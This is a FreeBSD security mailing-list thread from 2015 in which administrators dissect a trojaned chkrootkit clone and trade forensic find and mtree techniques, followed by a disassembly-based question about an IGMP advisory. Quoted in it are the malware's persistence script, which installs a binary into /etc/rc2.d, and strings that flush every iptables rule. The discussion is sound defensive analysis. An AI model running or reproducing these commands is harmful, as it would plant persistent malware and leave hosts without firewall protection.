Mailman/MimeDel 2.1.18-1 Cc: Joseph Mingrone , "freebsd-security@freebsd.org" , Philip Jocks X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 15:40:10 -0000 On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote: > > On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote: > > > > it felt pretty scammy to me, googling for the "worm" got me to > rkcheck.org which was registered a few days ago and looks like a > tampered version of chkrootkit. I hope, nobody installed it anywhere, > it seems to execute rkcheck/tests/.unit/test.sh which contains > > > > #!/bin/bash > > > > cp tests/.unit/test /usr/bin/rrsyncn > > chmod +x /usr/bin/rrsyncn > > rm -fr /etc/rc2.d/S98rsyncn > > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > > /usr/bin/rrsyncn > > exit > > > > That doesn't look like something you'd want on your boxÿÿ > > I filed a report with Google about that domain (Google Safe > Browsing), briefly describing whatÿÿs been recounted here on this > thread. It seems quite suspicious, agreed. > > Has anyone started an analysis of the rrsyncn binary? The last few > lines of a simple string dump are interestingÿÿ take note what looks > to be an IP address of 95.215.44.195. > > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$" > > > Cheers, > > > > Philip > > Chris Seeing as noone's mentioned it yet .. if your (linux) box were running iptables - a reasonable assumption - then running those commands would remove and flush all your rules, leaving you with a firewall that accepted everything, as good as no firewall at all. And then .. ? At least FreeBSD isn't the lowest hanging fruit for these monkeys .. cheers, Ian From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 18:02:59 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id E7D18F6F for ; Thu, 26 Feb 2015 18:02:59 +0000 (UTC) Received: from out1-smtp.messagingengine.com (out1-smtp.messagingengine.com [66.111.4.25]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id B7A61CAE for ; Thu, 26 Feb 2015 18:02:59 +0000 (UTC) Received: from compute5.internal (compute5.nyi.internal [10.202.2.45]) by mailout.nyi.internal (Postfix) with ESMTP id 8FC0121795 for ; Thu, 26 Feb 2015 13:02:51 -0500 (EST) Received: from web3 ([10.202.2.213]) by compute5.internal (MEProxy); Thu, 26 Feb 2015 13:02:52 -0500 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d= messagingengine.com; h=message-id:x-sasl-enc:from:to :mime-version:content-transfer-encoding:content-type:in-reply-to :references:subject:date; s=smtpout; bh=2gzxv/mJeMzPZtuOIVkm4evr J/o=; b=Tzq6zQnJ5Ay1wW3g2OjfxtzQIXI6s9kJzRSnuX78Ks0Dh6+o7itI2AJD bO7tcZMDoLVcgibizSLs0ZvJs0EClMNqBfjAAztdIaTU/PNWpsfoNrxX7nsTjd+x X4728HvLtvDQkb3yfnU7oCkIQIody0xD1JAKE9J4SPhoLeweu3c= Received: by web3.nyi.internal (Postfix, from userid 99) id 3A73511676F; Thu, 26 Feb 2015 13:02:52 -0500 (EST) Message-Id: <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com> X-Sasl-Enc: qJJs6PCrJ4dw5ww0iYcYocqzhOfAJXZo+ObfpP+N7dHF 1424973772 From: Mark Felder To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset="utf-8" X-Mailer: MessagingEngine.com Webmail Interface - ajax-4ba7306c In-Reply-To: <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> Subject: Re: has my 10.1-RELEASE system been compromised Date: Thu, 26 Feb 2015 12:02:52 -0600 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 18:03:00 -0000 On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote: >=20 > Example: > # touch -t 201501010000 foo > # find / -user www -newer foo >=20 > If you don=E2=80=99t find anything, look back a little further. > Hopefully you will find a clue in this way. >=20 Thanks for posting this trick -- I've never considered it before and will certainly put it in my toolbox! From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 20:12:45 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 3BE876AC; Thu, 26 Feb 2015 20:12:45 +0000 (UTC) Received: from dhole.grinstead.net (dhole.grinstead.net [IPv6:2a01:4f8:130:44cd::1]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "", Issuer "Dholes R Us" (not verified)) by mx1.freebsd.org (Postfix) with ESMTPS id A37B3E79; Thu, 26 Feb 2015 20:12:43 +0000 (UTC) Received: from dhole.grinstead.net (localhost [127.0.0.1]) by dhole.grinstead.net (8.14.9/8.14.9) with ESMTP id t1QKCYa5013159 (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-GCM-SHA384 bits=256 verify=NO); Thu, 26 Feb 2015 20:12:34 GMT (envelope-from glyn@grinstead.org) X-Virus-Status: Clean X-Virus-Scanned: clamav-milter 0.98.6 at dhole.grinstead.net Received: (from glyn@localhost) by dhole.grinstead.net (8.14.9/8.14.9/Submit) id t1QKCY3X013158; Thu, 26 Feb 2015 20:12:34 GMT (envelope-from glyn@grinstead.org) Date: Thu, 26 Feb 2015 20:12:34 +0000 From: Glyn Grinstead To: Mark Felder Subject: Re: has my 10.1-RELEASE system been compromised Message-ID: <20150226201234.GA1920@dhole.grinstead.net> Reply-To: Glyn Grinstead References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com> User-Agent: Mutt/1.5.23 (2014-03-12) X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.4.3 (dhole.grinstead.net [127.0.0.1]); Thu, 26 Feb 2015 20:12:34 +0000 (GMT) X-Spam-Status: No, score=-2.9 required=5.0 tests=ALL_TRUSTED=-1, BAYES_00=-1.9 autolearn=ham autolearn_force=no version=3.4.0 X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on dhole.grinstead.net Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 20:12:45 -0000 On Thu, 26 Feb 2015 at 12:02:52 -0600, Mark Felder wrote: > On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote: > > > > Example: > > # touch -t 201501010000 foo > > # find / -user www -newer foo > > Thanks for posting this trick -- I've never considered it before and > will certainly put it in my toolbox! While Walter is correct to give the universal form, if you know your system supports the -newerXY option you can skip the temporary file and use: # find / -user www -newermt 2015-01-01 Find is fun program to get to grips with to spot odd things going on. There's a tendency to assume you need to know what your looking for in the first place, but you can also tell it to show you things you don't know about: Files with an unknown user or group (tidying up after restoring partially from a backup, or spotting hacks that weren't quite elegant enough): # find / -nouser -o -nogroup I know my $PATH will have executables in it, and some other directories are almost certain to contain executables as well. But where are there executables that aren't in the usual places (maybe hacks, maybe users riding roughshod across the system installing things in strange places to trip people up later when they don't get patched)? # find -E / -type d -regex "`echo $PATH | sed -e \"s/:/\|/g\"`|/usr/libexec|/boot|/usr/src|/usr/local/etc/rc.d|/usr/local/lib|/usr/local/libexec|/usr/ports/.*/work|/usr/obj|/rescue|/etc/rc.d|/etc/periodic|/libexec" -prune -o -type f -perm +111 -print And you can combine them, of course: modified since 1st Jan 2015, a regular file and executable: # find / -newermt 2015-01-01 -type f -perm +111 Glyn. (Something of a fan of find :-) From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 20:43:25 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 80727465 for ; Thu, 26 Feb 2015 20:43:25 +0000 (UTC) Received: from out1-smtp.messagingengine.com (out1-smtp.messagingengine.com [66.111.4.25]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 6B959277 for ; Thu, 26 Feb 2015 20:43:24 +0000 (UTC) Received: from compute3.internal (compute3.nyi.internal [10.202.2.43]) by mailout.nyi.internal (Postfix) with ESMTP id 8748420E45 for ; Thu, 26 Feb 2015 15:43:22 -0500 (EST) Received: from web3 ([10.202.2.213]) by compute3.internal (MEProxy); Thu, 26 Feb 2015 15:43:23 -0500 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d= messagingengine.com; h=message-id:x-sasl-enc:from:to:cc :mime-version:content-transfer-encoding:content-type:in-reply-to :references:subject:date; s=smtpout; bh=Xd5zBD8keXeBFL5lxqaA7eF0 Ejc=; b=OKVpxNflHwZgaFS8S4JjIXm9uGjHkgTAW/FlWKXPF0oAkmMstci81xSi GpzjBFzt3qtj+KYLJjWlWtsSsOPyp97+Ugwq4SpqAuqhvr2RO3VhhTtFVhefNoPI eyDDCnR5yRl7b6dSTqxXYiRxAggapcR2QMG/PiTx12krfhlKru0= Received: by web3.nyi.internal (Postfix, from userid 99) id 2A2E1117584; Thu, 26 Feb 2015 15:43:23 -0500 (EST) Message-Id: <1424983403.4117041.232953973.212CCED4@webmail.messagingengine.com> X-Sasl-Enc: bGvHd3piBg+u2BJG+8r4SDYJoAPFiw0B01Zt+S/L7k6R 1424983403 From: Mark Felder To: Glyn Grinstead MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain X-Mailer: MessagingEngine.com Webmail Interface - ajax-4ba7306c In-Reply-To: <20150226201234.GA1920@dhole.grinstead.net> References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com> <20150226201234.GA1920@dhole.grinstead.net> Subject: Re: has my 10.1-RELEASE system been compromised Date: Thu, 26 Feb 2015 14:43:23 -0600 Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 20:43:25 -0000 On Thu, Feb 26, 2015, at 14:12, Glyn Grinstead wrote: > On Thu, 26 Feb 2015 at 12:02:52 -0600, Mark Felder wrote: > > On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote: > > > > > > Example: > > > # touch -t 201501010000 foo > > > # find / -user www -newer foo > > > > Thanks for posting this trick -- I've never considered it before and > > will certainly put it in my toolbox! > > While Walter is correct to give the universal form, if you know your > system > supports the -newerXY option you can skip the temporary file and use: > > # find / -user www -newermt 2015-01-01 > > Find is fun program to get to grips with to spot odd things going on. > There's a tendency to assume you need to know what your looking for in > the first place, but you can also tell it to show you things you don't > know about: > > Files with an unknown user or group (tidying up after restoring partially > from a backup, or spotting hacks that weren't quite elegant enough): > > # find / -nouser -o -nogroup > > I know my $PATH will have executables in it, and some other directories > are > almost certain to contain executables as well. But where are there > executables that aren't in the usual places (maybe hacks, maybe users > riding > roughshod across the system installing things in strange places to trip > people up later when they don't get patched)? > > # find -E / -type d -regex "`echo $PATH | sed -e > \"s/:/\|/g\"`|/usr/libexec|/boot|/usr/src|/usr/local/etc/rc.d|/usr/local/lib|/usr/local/libexec|/usr/ports/.*/work|/usr/obj|/rescue|/etc/rc.d|/etc/periodic|/libexec" > -prune -o -type f -perm +111 -print > > And you can combine them, of course: modified since 1st Jan 2015, a > regular > file and executable: > > # find / -newermt 2015-01-01 -type f -perm +111 > > Glyn. > (Something of a fan of find :-) Please partner with MW Lucas and write a "find mastery" to document all of these clever uses of find. (I'd read it.) From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 20:52:21 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id A6B2F7C0 for ; Thu, 26 Feb 2015 20:52:21 +0000 (UTC) Received: from out1-smtp.messagingengine.com (out1-smtp.messagingengine.com [66.111.4.25]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 6FFC43CC for ; Thu, 26 Feb 2015 20:52:21 +0000 (UTC) Received: from compute1.internal (compute1.nyi.internal [10.202.2.41]) by mailout.nyi.internal (Postfix) with ESMTP id DC79A2051F for ; Thu, 26 Feb 2015 15:52:19 -0500 (EST) Received: from web3 ([10.202.2.213]) by compute1.internal (MEProxy); Thu, 26 Feb 2015 15:52:20 -0500 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d=mjch.net; h= message-id:x-sasl-enc:from:to:mime-version :content-transfer-encoding:content-type:subject:date:in-reply-to :references; s=mesmtp; bh=+A9D5Dm41VpSUuprgDKfIweGdbM=; b=Eddv/Z RU36P0IW033CIYtxQGVbzZqfMcAbvjfRmyny8b/dqFaol8FZR5/kljTYbUIqbwWN VeWRj5MIFZf5ANObGc4ttRY5AMKdbk5hzr71Z+o3/8EoNNzP8bQOpbU2htRLJ+nY P7fPhq+KJs1Fftr/GDN0GC/trne4Aj+844aRg= DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d= messagingengine.com; h=message-id:x-sasl-enc:from:to :mime-version:content-transfer-encoding:content-type:subject :date:in-reply-to:references; s=smtpout; bh=+A9D5Dm41VpSUuprgDKf IweGdbM=; b=Z3M30Eqmt2REzpn+xir7i4i/IIHBKa1hLTo2tifqq0o59rTnRnnV qbE+6w5TNxhIiRorNm1jvu+9ynT0ncWp+h5AG1gdNBV6+EMzga6GDUaClU9K1hHK ahfvw6RAllHwBrTiMUVekRkoZpel3HEZmIrtcQ1pp/jFXzfjjI8s9ZI= Received: by web3.nyi.internal (Postfix, from userid 99) id 8C6AF11765D; Thu, 26 Feb 2015 15:52:20 -0500 (EST) Message-Id: <1424983940.4119761.232957121.03701F8A@webmail.messagingengine.com> X-Sasl-Enc: X2GIxBztsrEccESWAVUKVjUN3ki7eFevnyMW8Zae9csY 1424983940 From: Malcolm Herbert To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain X-Mailer: MessagingEngine.com Webmail Interface - ajax-4ba7306c Subject: Re: has my 10.1-RELEASE system been compromised Date: Fri, 27 Feb 2015 07:52:20 +1100 In-Reply-To: <20150226201234.GA1920@dhole.grinstead.net> References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com> <20150226201234.GA1920@dhole.grinstead.net> X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 20:52:21 -0000 I'd also suggest you take a look at using mtree for tripwire-like functionality into the future - its primary purpose is to be able to take the specification for a directory tree and either report differences or make the filesystem conform to the specification. not sure whether it is used in the base FreeBSD system but it's definitely part of NetBSD where it is used to confirm the permissions and other metadata information for files from each of the release tarballs and (iirc) runs once a week as part of normal system cron mtree can also be turned on a directory tree to capture a specification that matches it ... it is better than find in this instance for comparing the state of a filesystem over time as it can be set to calculate file digests by a variety of algorithms and produce output that can be parsed and compared against later (which can be difficult with the -ls output from find) I also found a copy of it to run on Solaris to confirm that changes we were making to our source only had the desired impacts to large application data sets as part of our upgrade process plus until I mentioned it here, it might have been obscure enough for it not to be trojanned by a rootkit ... :) Hope that helps, Malcolm -- Malcolm Herbert mjch@mjch.net From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 20:58:09 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 501AB9AA for ; Thu, 26 Feb 2015 20:58:09 +0000 (UTC) Received: from out1-smtp.messagingengine.com (out1-smtp.messagingengine.com [66.111.4.25]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 1C27F60D for ; Thu, 26 Feb 2015 20:58:08 +0000 (UTC) Received: from compute4.internal (compute4.nyi.internal [10.202.2.44]) by mailout.nyi.internal (Postfix) with ESMTP id 29CAB20527 for ; Thu, 26 Feb 2015 15:58:07 -0500 (EST) Received: from web3 ([10.202.2.213]) by compute4.internal (MEProxy); Thu, 26 Feb 2015 15:58:08 -0500 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d= messagingengine.com; h=message-id:x-sasl-enc:from:to :mime-version:content-transfer-encoding:content-type:in-reply-to :references:subject:date; s=smtpout; bh=M4PqyZQKjny95jolAJwZzSsR 5h0=; b=H4zFj+JIJ/zhYSBEsp2TzK1zj+bskUfE70Tb1YCPQnXHlzE9Lsfwx/5E wdJH8xUvnR47b122AWrBR1ZRNqJfcvAcAVVEA5UyOoiZ6Vpm1EQidW4SsOysZT/Q NBaq98GBcgwE3vRNcfA/BZgMYtTY2sn52GO27n9+RtFKjjvH46M= Received: by web3.nyi.internal (Postfix, from userid 99) id DB811117680; Thu, 26 Feb 2015 15:58:07 -0500 (EST) Message-Id: <1424984287.4120744.232959461.2199527B@webmail.messagingengine.com> X-Sasl-Enc: aQdaVWXJsWuRW17/SAqcDZgFz5q+N/VXkfenRTmsWKfz 1424984287 From: Mark Felder To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain X-Mailer: MessagingEngine.com Webmail Interface - ajax-4ba7306c In-Reply-To: <1424983940.4119761.232957121.03701F8A@webmail.messagingengine.com> References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com> <20150226201234.GA1920@dhole.grinstead.net> <1424983940.4119761.232957121.03701F8A@webmail.messagingengine.com> Subject: Re: has my 10.1-RELEASE system been compromised Date: Thu, 26 Feb 2015 14:58:07 -0600 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 20:58:09 -0000 On Thu, Feb 26, 2015, at 14:52, Malcolm Herbert wrote: > I'd also suggest you take a look at using mtree for tripwire-like > functionality into the future - its primary purpose is to be able to > take the specification for a directory tree and either report > differences or make the filesystem conform to the specification. > > not sure whether it is used in the base FreeBSD system but it's > definitely part of NetBSD where it is used to confirm the permissions > and other metadata information for files from each of the release > tarballs and (iirc) runs once a week as part of normal system cron > > mtree can also be turned on a directory tree to capture a specification > that matches it ... it is better than find in this instance for > comparing the state of a filesystem over time as it can be set to > calculate file digests by a variety of algorithms and produce output > that can be parsed and compared against later (which can be difficult > with the -ls output from find) > > I also found a copy of it to run on Solaris to confirm that changes we > were making to our source only had the desired impacts to large > application data sets as part of our upgrade process > > plus until I mentioned it here, it might have been obscure enough for > it not to be trojanned by a rootkit ... :) mtree is a really handy tool. I especially love it for large changes like changing the UIDs and GIDs for a lot of accounts. If you take an mtree dump, change the UIDs and GIDs, and re-apply the mtree dump it will quickly fix the permissions across your server because it stores the user and group names, not the IDs. I wish mtree was readily available on Linux. From owner-freebsd-security@FreeBSD.ORG Fri Feb 27 23:32:48 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 321AEB65 for ; Fri, 27 Feb 2015 23:32:48 +0000 (UTC) Received: from mail-la0-x235.google.com (mail-la0-x235.google.com [IPv6:2a00:1450:4010:c03::235]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id AA35FC7A for ; Fri, 27 Feb 2015 23:32:47 +0000 (UTC) Received: by labhs14 with SMTP id hs14so20527965lab.4 for ; Fri, 27 Feb 2015 15:32:45 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=ylBIsPtYr5qFxG47tBRKqF0bpkcWv1NwjXbboxmn1NM=; b=Zdja9uvmGRTqBxdXvlgjnVk88seTzC+OUcQPYkeCIEjl1MFv8C7A+n0/Wr5mGIHvJO JUwB29jLhYGyCBlo2YHxe6853L3v52UuFkj7un/idvn+YcyZUBCWwp73Z0/ssODjIc00 8D9vNDg+R0XxAQAlr9b8HNzUQyl7KkKIvHiOxWnE36Z+yIAeOtUXoJB3rLsA65ipwWO7 KZ1IBIffWFyxJAW83YPU1SP6/L9ZMTqEmGCFuq2rMCGJq6pimbU/1kgZpfyjedaALqYh 7Ddz8hlLB+/INGg+zSPeISZFYDEh6SeQf6yZmefRiSYsUre5lV559toYRvWLGij4d1KY KPUQ== MIME-Version: 1.0 X-Received: by 10.112.51.114 with SMTP id j18mr14476666lbo.97.1425079965297; Fri, 27 Feb 2015 15:32:45 -0800 (PST) Received: by 10.113.11.165 with HTTP; Fri, 27 Feb 2015 15:32:45 -0800 (PST) Date: Fri, 27 Feb 2015 15:32:45 -0800 Message-ID: Subject: Requesting clarification for FreeBSD-SA-15:04.igmp From: Shawn Hoffman To: freebsd-security@freebsd.org Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 27 Feb 2015 23:32:48 -0000 Hi, I would like more clarification to be provided about who/what is affected by this patch. As we can see, amd64 is not affected: ( 9.3-RELEASE, md5 c4605d83b454c7633149a4eb3baa8b83 ) .text:FFFFFFFF80A04AA6 mov r14, [rbp+var_88] .text:FFFFFFFF80A04AAD add cs:igmpstat_0.igps_rcv_v3_queries, 1 .text:FFFFFFFF80A04AB5 movzx ecx, word ptr [r14+0Ah] .text:FFFFFFFF80A04ABA rol cx, 8 .text:FFFFFFFF80A04ABE movzx ebx, cx ; rbx = ((u64)(u16)ntohs(igmp_numsrc)) << 2 .text:FFFFFFFF80A04AC1 shl rbx, 2 ; rdi = (u16)(((u64)(u16)ntohs(igmp_numsrc)) << 2) .text:FFFFFFFF80A04AC5 movzx edi, bx .text:FFFFFFFF80A04AC8 mov ecx, ebx .text:FFFFFFFF80A04ACA cmp rbx, rdi ; u64 compare .text:FFFFFFFF80A04ACD ja fail_igps_rcv_tooshort This is because the result type of ntohs is the same as uint16_t, and the result of sizeof() is size_t. Because of this, 32bit x86 should not be vulnerable either. I can only assume platforms where the int type is <= 16bits may actually be vulnerable. I have no idea if freebsd actually uses such configurations. I think this information should be clarified in the security advisories (which in this case, only give explicit details on how to patch "a RELEASE version of FreeBSD on the i386 or amd64 platforms" - which are not affected afaict). -Shawn